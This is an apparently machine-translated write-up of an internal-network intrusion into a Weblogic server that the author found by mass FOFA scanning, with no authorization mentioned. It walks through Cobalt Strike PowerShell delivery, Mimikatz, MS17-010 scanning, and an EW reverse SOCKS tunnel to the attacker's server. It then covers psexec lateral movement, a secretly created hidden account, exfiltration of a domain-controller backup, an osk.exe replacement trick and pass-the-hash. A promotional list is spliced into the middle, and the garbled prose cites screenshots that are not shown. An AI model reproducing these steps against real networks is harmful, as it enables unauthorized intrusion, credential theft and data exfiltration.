preface
Because I still want to practice the internal network, I used the simplest and crude method to find the target. I used FOFA to batch a wave of Weblogic and found the target in a short time.
A simple look at the machine environment, out of the network, no soft kill (later found that there is actually a very small firewall, but not powershell), there is an internal network environment. So try the Scripted Web Delivery module for CS directly, creating a Web service for one-click download and Execution of PowerShell.
Run the Powershell you just generated
CS on this side is online.
1, 200 copies of many out-of-print e-books have not been bought 2, 30G security factory inside the video materials 3, 100 copies of SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit 7, emergency response notes 8, network security learning route
So let’s take a look at the system information.
According to the above information, the server is 2012, and the Intranet IP segment is 192.168.200.x. Then, Ladon is used to scan the Intranet environment.
There are not many machines in this Intranet segment, so you can see the domain environment. Then a multi-network card detection, Web detection.
You can see that the Intranet has multiple network segments and a Web service is enabled. Mimikatz only got one user and an encrypted password
The password can be unlocked on CMD5
Next comes the most exciting time to scan MS17010!!
It can be seen that several machines may have MS17010, so WE plan to open a SOCKS proxy to play directly with MSF. When you buy a server, you should try to buy a pay-per-view server so you have to temporarily open a pay-per-view server and re-open a tunnel out using EW.
The process is as follows: Throw the EW file to the newly started server and run the ew -s RCSOCKS -l 1900-e 1200 command to configure a forwarding tunnel. This means that the proxy requests received on port 1900 are forwarded to the host connected to port 1200
Then upload the EW file on the target machine and execute: Ew -s rsSOCKS -d xxx.xxx.xxx.xxx. XXX (server IP address created above) -e 1200, enable the target host SOcks5 service and reverse connect to port 1200 of the transfer machine. After execution, you can see that the connection is completed.
Then the agent is OK only in the local configuration. Windows programs generally use sockSCAP configuration of the following proxy is good.
Because we want to use the MSF of Kali in the local VIRTUAL machine, kali proxy configuration is more convenient, first vim /etc/proxychains
Add proxyChains directly to the application to launch the proxy. For example we MSF want to hang proxy, directly: Proxychains MSFConsole Intranet road is always so bumpy, after experiencing a change EXP, change tools + shake people, determined that MS17010 is really not used. Since the shortcut is not possible, take a different approach and start with the Web.
Tried the weak password injection of what, did not succeed, Google translation are not translated, even into the background estimates do not understand, or find other ways. So I began to gather more information:
View and save the login credentials
View the list of shared computers and then try to access drive C of the shared computer
On the last one, Ping the machine successfully to get IP 192.168.200.6
Right-click on a beacon to create a listener
Then use psexec_psh to try to bring the server 192.168.200.6 online
Successful online
The next step is to do a wave of information gathering on the new machine
Nothing else and then we go back to the starting point and see what other machines are in this network segment
You can see that there are four Linux machines, 22, 1, 5, 11 and then we can try a wave of weak passwords.
I simply checked the information about the process, but did not find it. Although I had taken down two machines on the Intranet at this time, they were not machines in the domain. The weak passwords of other Linux hosts were not correct, and they were in deadlock. At that time, I saw the machine named Veeam Backup that I had previously taken down. I thought it might be a backup server and there might be backup files on his hard drive, so I carefully checked the contents of each of his folders.
In the folder of disk D, I found a folder called Backup, which stored the Backup of three machines. A quick search of the suffix reveals a software called Veeam® Backup & Replication that backs up Vsphere and others.
It became clear to me that all I needed was to install Veeam® Backup & Replication locally, compress the full Backup package of this DC to the local computer, restore it to a VIRTUAL machine, and override osk. EXE with cmD. EXE through PE. In this way, you can call up the command line of the system in the login interface, and then try to add or modify the administrator account to enter the interface. You can log in CS locally, and then perform hashdump to directly read the user HASH of the storage domain. You can directly take down the DC online through Pth. To start, because the backup server is not out of the net, but he and 21 this machine out of the net have a Shared folder, for the sake of convenience, secretly on the backup server creates a hidden account, direct 7 z amount all the latest DC backup compressed into 700 m a package of all on the Shared folder. The machine also has only 7001 port to go out of the Internet, so I found the Weblogic Web path and downloaded the compressed packages from the shared folder in the Web path. Because the bandwidth of this network machine is too low, the average speed of 200K, but also kept card, after a long wait, finally down. During the long download process, I downloaded Veeam® Backup & Replication on my computer and found it interesting that it supports local administrator logins.
And since he is backing up a vm with another IP, I guess he is on Vsphere. So I hooked up the proxy again.
The local download of the full backup is also very easy to restore in the local, just need to install the software double-click back to automatically open the software.
Reduction to complete
Now it’s easy. Download old peach, generate an ISO PE toolbox
Mount the vm to the VM and press ESC
After entering PE, rename cmd.exe to osk.exe to overwrite the \ Windows \ System32\ osk.exe in the original C disk. This way, when opening the on-screen keyboard at boot time, the SYSTEM permission will pop up the command line.
There is a problem with adding users directly here.
Finally, a domain user is added to the local administrator group after changing its password to log in to the system. Finally generate exe online when the firewall is finally protected. Give a front view of the firewall.
Turn him off.
However, shutting down required a password — and eventually went live with the original Powershell.
And then the most ritual of all
Finally, just use hash to depress the DC on the line.